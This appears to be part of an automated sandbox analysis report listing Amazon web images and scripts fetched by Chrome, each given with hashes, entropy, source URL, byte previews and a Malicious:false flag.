                                                                                                                                                                                                                                                                      Entropy (8bit):7.84330588749723
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:G74MMMMU0gDqG2LbJtvjv1O/vb/jACEgvL/OrhiT+S50CiQaWuTuvJ7aKhv6:G7kfgD32TNgjUCE+LOtib0CiQ7uyx7aJ
                                                                                                                                                                                                                                                                      MD5:02C4CF27E6C7DA8F23AD7CE2952C16AE
                                                                                                                                                                                                                                                                      SHA1:8F5635E86656D2D9AA8E1D2E86A86E14498005B9
                                                                                                                                                                                                                                                                      SHA-256:1E44B0B6B390CE01C99417765258BA45B2530C39349C6976A31C3F5AE3216B5C
                                                                                                                                                                                                                                                                      SHA-512:424DA75FB6DF5642ACFD1E46749A2E9718BD10538702311CAAC1DC34ACAB67C7E642C1DBBE59ABECD5E22D1D6FD8151038AA57571207DA897265360E1C2BF2EC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/889509ef-90c0-4959-bd54-1a1faad422c6._CR0,0,700,700_AC_SX175_SY100_QL70_.png"
                                                                                                                                                                                                                                                                      Preview:......JFIF...............................&....#...#.##..#..'#..#'.#$4$*&.'$1$4$4336:<4#:P...........1#.'3*.$=3<'3633&C3<13.43'..''*$*3'664.&61#G&'#31:.#6@......d.d.."...............................................................!..13QRa...."2...Aq.#.Br...................................................1..Qq....!24ARS."3a..r.$............?..vQI...'Z....}.0.<.uW.g...v..L.h\..N.r..7C..4..{..R..?y^.SI.@..t=.sNn...ju).~.SI.@..t=.sNn...ju).~.SI.@..t=.sNn...ju).~.SI.@..t=.sNn...ju).~.SI.@...RmQ..R.qN..R.FIcI\.lMe\.h...a.Jy..u).SI..j...]}'....}.Yb..4..X..........\.............._MF..^...r..V.uI..1|.b.iL.q.$..Ch..&.+.Mp.+...1l[.....i.......@...w/../U.U........(N........Eus.......}.....u.....Gr.#sxU.U..*]$-sn..D...?..N..uu.e...E.....N...[^........uo...6..U.U...f....n.(...0....]E..K..?...:..*...=.#K.3.._|/T.S......~#....X..:.U...M.g..S..n...8........OV...,.I.m.).kab.C].eh.."K..t...h...Ud.2.).........Q.rd.nnkB..3R.7....VD...w.R.[d\...p..V..u.......m5.`..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15160
                                                                                                                                                                                                                                                                      Entropy (8bit):7.903306674101077
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1eGpQ0Lr0Nm75qFfBJGuvljX2m5GvPO0ObgU:1l1LgQqfJGuv12lqbgU
                                                                                                                                                                                                                                                                      MD5:BF91DF9055007AA7C224F69067958108
                                                                                                                                                                                                                                                                      SHA1:70124F446C68FAA3F7B2DA9B3820C1A5D6528198
                                                                                                                                                                                                                                                                      SHA-256:17BB4AD1932CD873241487109BB2359F9B80577DBCCCD5DC82C1A75B8B594B0A
                                                                                                                                                                                                                                                                      SHA-512:5085B3199452ACAD594F68545A36712A5E0D13AD6A152414EC735C3ED178081A3C23507D37A1793E5F6F72B7F94C58054783440F4741FD92FC52FF9498498FAD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Skyland-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."...........................................................................................&.0............k9....<\.[]...........9m...i.\..k.c.v. .........rJ...U..>.>y..+.(.............Y...M......=..~.:p........<....@..<m.w.3I.6G./%.............b.................././F-kj.|..n.................wa.ro...................r:........._.6.?.s.]..5NS..`.............I......H..M.=r..Q..........Ui.5.w.`...s_.....$..(........^.q..C....Y.............!U.ix..............@....y[.4X.b.......;....<.e. .....g.....T.g_a.U]..........(..I.@..(.!.......,#nZGE...cM.7-.i........`.....................V.......3........F.`.........~{..(..............b.....[S.N..~............/.G.a....M.-tL.>............O........`......7.w..3...........5....[...L.....6YV..v6r..........o.....MC.2.......q.....p|e.*.`......... .Z......f.,.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):42629
                                                                                                                                                                                                                                                                      Entropy (8bit):7.953691836651141
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vDzKvda/KAlIUbsGQodVr6tF8LAXlaJ/LPF5iCJWOe7oUOtjrPTIewvBDa3:T/BBBSuG6nBJ7Uise6Va3
                                                                                                                                                                                                                                                                      MD5:9ED3802BE9B66CC15144D53830C93A7A
                                                                                                                                                                                                                                                                      SHA1:00DCD573B50B3CF6CB6B85ABFBEEB15E7252EEF0
                                                                                                                                                                                                                                                                      SHA-256:87619BFC60D16B2F1E1202744CF749736EAE499E52B09DE6A2C1F704FF738CD5
                                                                                                                                                                                                                                                                      SHA-512:04AE3CBC2BC9EFB0A110C7689C7EC84C6A2F4CA8CE5C64F20C96B3DC79BD086037F4AA77FF4227002851E25EFE45D17B53375752CB25918CADEAC5E7A6B1D72F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_OHL_Lunchboxeswaterbottles_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d..............................................................................................................!1..AQ."a..#2Vq.....BR....$38br...Sstv............&6CTcu.....%'4DUd.57F................................!1AQ"aq...2R.......BSr....#34b.....$5Cs..%T.c..............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....@Y..yv.I."...-.>........e....k..h.?...2k...r..3.ex..D..^.c;.m]...".......f:Yh..}m.....'....C.....y.Q.\L....}.v..-EH.i.....^~v.e..5l8.....v.....a.S...z..-;.m..H......Q...>r.?5{.|.e..R^...3a..e...W....{.o.....n.c.1....9Tw...K.h..a..o.............@....mW.e....?.\Z;..;.."7..~..*W.+|...U/..P....S.D=........{bo|r.......M...k..z...n..d..r.g..5.e.n..l..vk,..R.r.Y.{.....kx+...Qzb...4.N..e%........e(.......9.w?3n4.?.^.'.<....n........=k........JQ6l.3.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8843
                                                                                                                                                                                                                                                                      Entropy (8bit):7.893627741188661
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lsBpfB8QwSuf/RFfOzb/rKraxvSiSDcOPRtmlcKPTMedd0P:EfzpURFS+r2vSiS4K0MedC
                                                                                                                                                                                                                                                                      MD5:32D41341A71CAC76617298A53B6BEC9E
                                                                                                                                                                                                                                                                      SHA1:A8F1B340F6875C0728CBEF5049BC91EE906BA765
                                                                                                                                                                                                                                                                      SHA-256:2FF4F9A2BB58175901AF1D6F2976A6EBE40D42ECF680964880A213805532FF32
                                                                                                                                                                                                                                                                      SHA-512:6A6D8436A234C348822BE43FF94267FC18ADF205662983421134CBE5B9F957435EA3D1A57AC286B39E7A8BFF27F6C6ADBD43A5D76FC3DD539A335EA5D878FD83
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41iXOCSvWNL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X............."....BZ..j$%....BZ..j$%.?a......~~)..^kf.}*.T.Y.tj#f;M...q...........Wa.O...F............O.].z.....~...M....j.}2\...uVK;k7.S....O..<....).F.I.QX]..sv.b......W.u....SF}!...p..j.-....=....P...4.v3..t.g..om2.<G.}.n.c6/BC....{.:..5.T..k....B.......52.|..6.{..Uv.+....Z.]....Mk(.&.Bz:.........7.>.n..p......../.o.p.s.wZ5)......E.-.?..d.|m.Y.-J..p...x.I..Wl......\.gU..n........uv..wSo.M....*}.^..Q.....b...q..mr..t]..]..........].k....I.3ZF._..."..............|Z.N=_O..I]t.2..w.=o.z$y.......|.l.|..&/.......e..g..Y~.7..c...|W.t!.L1...^m.].U.5..........8l.Fy........_..~.v..i......9c.....u%.W......_............~~..............................................!"01.#2.AQ. 3`$4B............`9.|w.....g{;....w.....g{;..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36397
                                                                                                                                                                                                                                                                      Entropy (8bit):7.93171690168982
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/UM4UpfB1X+rZ8VpjefP6HjUha739q/RwEST5/zQhC:/UdUpzOopqfyD996TST5d
                                                                                                                                                                                                                                                                      MD5:879548148F6432CF0DA1564ABB796C3D
                                                                                                                                                                                                                                                                      SHA1:15F6FA844D6CAB6E5140E3AA27FAF0C9ABDAFE36
                                                                                                                                                                                                                                                                      SHA-256:EF12A4762D3DFC753A30406B50E4C7CED5A279A14E0646BD945337BC1B3159B8
                                                                                                                                                                                                                                                                      SHA-512:A78C5206026A183787B5F42A616A55724C9DB100D51C4E214FF23000D1CF6FEB3EA609A152CE401C7879CDA6A950E00AB6924326617FCD89FB26ECBB2B69D86F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_SL_Dealsonshoes_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!.1..A"Qa..2q...#BV.....$38Rbr.....C..stuv......%46........7FSTcd..............................!1..2AQRaq......"S.....Br..#3....4Cb...$............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....@Y....+.EH..,:..............0..?..:2k..^.dg..b*p`.]..w...$..".....V.t.....B.......g.p.[..S].O .....,;...j*E.H!.......Cm'..a..=...........78.....-;....$C.j...(....Yq.?E{.....).......'......s|....?..1.....B;...7...4d,....}.._../........?.=_[....?....|..x...e.}-J...Z.....K.vP........\.3.^$._..o.Av|I8.v.C?.....r..2]R.[..E.|Mv....'R. \..i..m.eg..?.k.....Nk._...{...JK..^..........]d~3....Hq.......=...d..4m...579/.?z.K........M...q...F......Mkx...1...+..O2.E...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):93236
                                                                                                                                                                                                                                                                      Entropy (8bit):5.397125859693619
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                                                                                      MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                                                                                      SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                                                                                      SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                                                                                      SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery
                                                                                                                                                                                                                                                                      Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):34472
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969048625455795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1CLk/CtJDxuqcQffQl6mL5IIae6MjEnzAVFtGx1s9JbC8onGWv:WJjsqcYfQl6mFIIay4nzAVFMx1WJbOGY
                                                                                                                                                                                                                                                                      MD5:0D8FAF9D6E68111A92BF63C524D047A2
                                                                                                                                                                                                                                                                      SHA1:372753D7B75869BD184F797EE6C15CE2D1244BBC
                                                                                                                                                                                                                                                                      SHA-256:C921A354593AD6934C8B7396E92022CA70217CCF33BE5A5F4A2D9CCE688911F4
                                                                                                                                                                                                                                                                      SHA-512:7CA1EBE99949DAD4DEA87CC248B2F140DF94A756F9A0C066FBDF3564A9E8A0DDABEF445395EEC0E13D5D6EC1E8FB9F3FECD6F4A39BC061F457C4AD05FB7750AC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-Table-tennis-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................EW..(.s......M....... ....+.U..p"..D...&.Z.\K.........H.{.E{.QG>..B.u.Fm...=..........$.."...gn...iq....^.\C.. ....Q_e...+.....e.?m<94....#.....G.#ot.#....um.U..b...#.=...h .....lM..(pR....k.,N..sN..N..O.Z..Inlt..L.9.C.I..r.<.U.........K.z2:2y[......fMNv.>V...#..G.W4#.[y.E;..e.k...X....5....69Z.y.=}.+..%...Q".g].5]..v..9.{..R..<....<..X.;Q.g.(.j.Dkvv.|.....^..k.V;...\...t#..yLL.PG....r..4.......:-.....f..6E.-M.80.b.rn.1...K.W+k.'.$.c9...s....r..-....:;8..K..3S.J<H.F.<t...F..f6.1c...V..:=..#.....7ws.Fj.7..qA._Qt.....KB.u....J.....fs:...'F...I.p.,..4...L.E...G..]$.aq..........FL^7.......:^3..o'..b6F.m>.V........R......#.......Z..6._..gE.:.@.Uh..UnBg.=.^+.t....Un'...=..w....]Z.r....A.F...C7.f.'e.&;N.....,...4....5..nS....t...`..DY0`..U..._t...s.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8724
                                                                                                                                                                                                                                                                      Entropy (8bit):7.761883753720958
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1Wjw/yUNf5ll2HDuQ6V71Jc/sQQN1DvyVGRYfErc9AMFvj0GIqs1:6GmaQi5eQbRY0c9cGIqk
                                                                                                                                                                                                                                                                      MD5:7A6C54F0AC32E2B191446B619031115F
                                                                                                                                                                                                                                                                      SHA1:72F98CDDE0225D2BAA6B49F6423C9DEA69C8F483
                                                                                                                                                                                                                                                                      SHA-256:2582D182D6FA8247E2D35FDC2A92A6CDA8D98121770861C8C33FB571365CD1E9
                                                                                                                                                                                                                                                                      SHA-512:9AD1A9703931983793686829614E6AC7448768B08B2C2420FDF83463FE6EF4B5EE7EFCEDC9F196B4696811887F34B2AD0CD09DA2B310E9C81338EEB5FE175B51
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................................................................j..".~u..4.}b..\.e........l.7...-..%8l/5.......Q}..j..'..).....8.............L.Z=]..Im.{|...A.>;.6...N...{-.......T5..T.o%.g*.'.j..|..&.#.3.*....F..V.z.z"................G.1..@..p...}M.........C......wT.T.Qxl..N....eb.U~*[...V...".Hd.%..P..........9...............^.&.5N;>.....R.fJ.......2....N..Z..!..he.9...........J5.63+.F.m..&..=..=.~9H.............]...w...?..'Bg.u....wm9.7Yr.YMb:.p.E;6...=...gey...y6....-....6.....7.0..t/>t..2.9..............k...z..I[]ZLrOZ.O\.uO8.8z.I..U..}.....^...=.....0..H..+...+.9....f.r...........0?..u...4.....K.Ir?]r?X.x.?...{..$jCM.Y.]....,...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2243
                                                                                                                                                                                                                                                                      Entropy (8bit):5.266863481297427
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:ZE3+F8d7jMMxU5ADpLPeaBBsPFOO0qTZk67KUTZ/UKpUBYIV:ZEOE3BVLPea0DpTZkyTZNi
                                                                                                                                                                                                                                                                      MD5:7802F6FC1955CADE889CCEB253C16029
                                                                                                                                                                                                                                                                      SHA1:F38F7FF9F7D2443F21590B3D9B4B5E8ADBF05167
                                                                                                                                                                                                                                                                      SHA-256:AA06AD40D619339C61E3B35B502111B035C03B51DEADB11A3539C9D8C4B08EF7
                                                                                                                                                                                                                                                                      SHA-512:20E6DD6C78BB5F54A87CC99F86484C5451FB6BEA51F2ADD3FFB8E580E096AD78DEB781310061881DECAEE1160EEB3BD542E42C9C3FFD1534CA6FA985C160B0FC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:'use strict';mix_d("AmazonHomepageCielCards__ameyal-product-shoveler:ameyal-product-shoveler__Kvjfy9i1",["exports","tslib","@p/A","@c/metrics"],function(n,p,k,q){var f=k&&"object"===typeof k&&"default"in k?k:{"default":k},r={},m=function(c,g,e){void 0===g&&(g="");void 0===e&&(e=1);g=c+g;r.hasOwnProperty(g)||(r[g]=!0,q.count(c,(q.count(c)||0)+e))},w=function(c){m(f["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var g=function(a,b){a={$event:{preventDefault:f["default"].$.noop,.stopPropagation:f["default"].$.noop},$target:a.getContent().find('[data-a-tab-name="'+b+'"]'),data:{name:"energyEfficiencyTabSet"}};f["default"].trigger("a:declarative:a-tabs:click",a)},e=function(a,b){var d=a&&a.$event,l=a&&a.data||{},u=l.activeTabName,v=l.modalHeight,t=l.name;d&&d.preventDefault&&d.preventDefault();d&&d.stopPropagation&&d.stopPropagation();d=b.get(t);d||(f["default"].on("a:popover:beforeShow:"+t,function(h){h.popover&&h.popover.getContent
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):59849
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9719454048172675
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:AV/K8PMmwETLFFJn2vkNrgVmZIud0DSnZSe7+P:G/KQwETLdnW8rgVK0Dk8e7+P
                                                                                                                                                                                                                                                                      MD5:987E3DDAC3D34C5724954BEFFD75D52E
                                                                                                                                                                                                                                                                      SHA1:884F33C5CE2BE7E8B52CAC1311B89E138C378AE7
                                                                                                                                                                                                                                                                      SHA-256:9BA31014F9F97F405BCD46F9EA2CC124F7EEDDB7E0FE7AE579C37F5099C50D30
                                                                                                                                                                                                                                                                      SHA-512:973057698AF356A56D1BB6CE83797EF91FB76AB5E941014640058108BCFD269C0006A9866B2D0D7DEC7096531F2076135CEDC68D8D09B479E61C87AF29E2C5E8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................<..................................................................................X..0...@.WoQ.....q..g.>?uK.....}[...&.Y?0.....................X{.dX......yG.........^..r...BJ.C.s.:................Q."...s.I.w8..........3;.I.s............<~...!....^.............d.h.$.............:V?..v.ef .9..........e.....u...........2e....Y..}...........R...;'.r.M.@.........47.R?........q.-<#vQz_goA.S:.K."...B.hX...?....Z..3}y|.?y|...8K...@.....Y..-.a............~.G...ox.)Y.w.-........... |...}U...o.0...K)....#H....D./"!...........?....].sgF?./..........W........Pd...E.y.i>p..&,.S.uG`...#.Y.P.Yr..............B.b.-/.:.f...,p..')XVG.p..........F.....@....}..&H.M.@..:.4.+#Ps{..{........]}.....v.l.V.v9.F..O....}.k...........!...B..}.B....0.....Y..8.._ .......4...=.>.W`.>.6...2|..xd...}.&.e...y.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3076
                                                                                                                                                                                                                                                                      Entropy (8bit):7.876345042072062
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rmwYN1kpTrLvvvKaORyPFmtl8j+KT/AGyASNsCtNaeH7F88d2fkUKv2J3lscX:TzN1kpjUyE6ToGyANebF+seXscDT
                                                                                                                                                                                                                                                                      MD5:C75E02A77BCA6C29B06FD72B498E2DE5
                                                                                                                                                                                                                                                                      SHA1:C1041D5789652AF895F73E846DDFBD6E61244602
                                                                                                                                                                                                                                                                      SHA-256:CFA95B85E4091DDEA25312C89FAA28306DBDD539C13A6DBC8D432891EB0471FD
                                                                                                                                                                                                                                                                      SHA-512:AFD88E377B2B7895F59762464FA9CD21959179EBF373FA693F9CC012471556E532186D0C55F317123795937C9A4F2E94E6E864540B887ED240328EDDC5C06A87
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1."A2QRabq.B......#34c..$Sr.................................................1.!...."2AQb............?...*\..(..(..(..(../Y..8?i.'XP..z.......Pj....x...|f...+N.Ad.8...M8...H.....H.Fa..~.VL3$....".....[.ea.A....JR.JR.JR.JR.JR.JR.JR.Q.9...?K.Qu.&BA..,..g.A.z...!W.5B.|i.Y.%...X.N.m..x.{3.O.O."./A../...Z..4.]......EO..*.{....u..E...E..,......*GJlf.&.M..{....d~..LA..a.....5.r...k...c.&..!..<....._.@/..\r.r..K....KG......%...su..=....)J.)J.)J.)J.)J.)_..5g.."+.v8TU......M...:.i.&.Ct.....+h..........4..&..q.=...\.K.L...m...-`..G.]........[..E.xSL....H..n.7.L....t.....4.iJ.[....V`.p....{u.c....e..%..i..4/t...33/.....;..x.Mn{.w.W.../..U".+......-]....3....7..|....s]T.p{...+..)JP)JP)JP)JP)JP*....in.a='C-.~....8...2..$.6...>...d6....A...{..Mg^.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1866
                                                                                                                                                                                                                                                                      Entropy (8bit):7.6943040406752505
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r1a8+fK/YJpXsO3sGVXqCQFZAT7oOLu/W/ABrU:TzRpVj8GMxZAQOye/kI
                                                                                                                                                                                                                                                                      MD5:CC66B764E2A645A7EAE8ED82E072E766
                                                                                                                                                                                                                                                                      SHA1:FDC753835DB56C90114C62C9E06EC52204DE675C
                                                                                                                                                                                                                                                                      SHA-256:9B73840D71D7735B82C3FEC0729783F40CDFD295810EBE09A2C87FD617C84AFA
                                                                                                                                                                                                                                                                      SHA-512:382E1EDF4EE31DEF46449D21AE2F95E6267077F643A756E59D85516FDEC81E2DB7DC3A3F03605D4FF64D9B6EB791AB4396BFF0D302FCD5ED6A264FA5F4BD2EB0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..AQa."12qr.B.......CS.#$bc............................................!A1............?..............$..1.H..1...;.h..I...Z.j....Yd0S....<.G...a.RZG..A.}...`5.\%.7...l>...6.M.$.....3....D...R.&...H\(." ""." ""." "+k..Va.U]...F.a..~.o.Wr....n..o..+...j....-../Qp.._.J.}d.|...9..K.qq..s*Y.d..Ew.G..?q,..5V~.....Oqs.&...q..Z.@o..`Z.;..r> .t[S|b`.<f......AZ.t%..G....ve....5s;zfoG+..-3.!_j;..+L...1.M[H....D(." ""." ""." (......Kg..N..}....3..c..f..I<..j.;..........I....J.....My..#.]./H.....lP..d........\=..5.g.j_.G.W..~..RR>$.@.%q.1.$.....8h{Q.....[....m.^*..V.t..o.T!...6..!Y....cI}.=?.R%a..R.V....X..4..T.""." ""." ".@'@...}..0..V..,b&z.....+^..V.y.....@.wH.I]........g...<i...chc..o.......p..fz..c.V%l[.Y...l..t.L..{...?y*..{h.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 1500x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):27987
                                                                                                                                                                                                                                                                      Entropy (8bit):7.844134054765301
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Qhv3RS3tzkMSQFL0RDI9QC/+LsgtxpA+ni:EGtgOFQ4+Nx2
                                                                                                                                                                                                                                                                      MD5:95E685309717264094D1C4AB72012353
                                                                                                                                                                                                                                                                      SHA1:E567C7AB0B358830C0C42B5B5454DEC06CC4D713
                                                                                                                                                                                                                                                                      SHA-256:41D6E0AE43FB141C7B9554D9008FCDBD07CDF82D049B0388AA9F4BA9618B8E4E
                                                                                                                                                                                                                                                                      SHA-512:C47AB12D71A86AE2925DCCB419FEAA10533C944EAC63345EF4523B8EDCF8DC6F9C013725DB82B817197249897C922285771337465D22B7F315160FDBA05ED29C
                                                                                                                                                                                                                                                                      Malicious:false
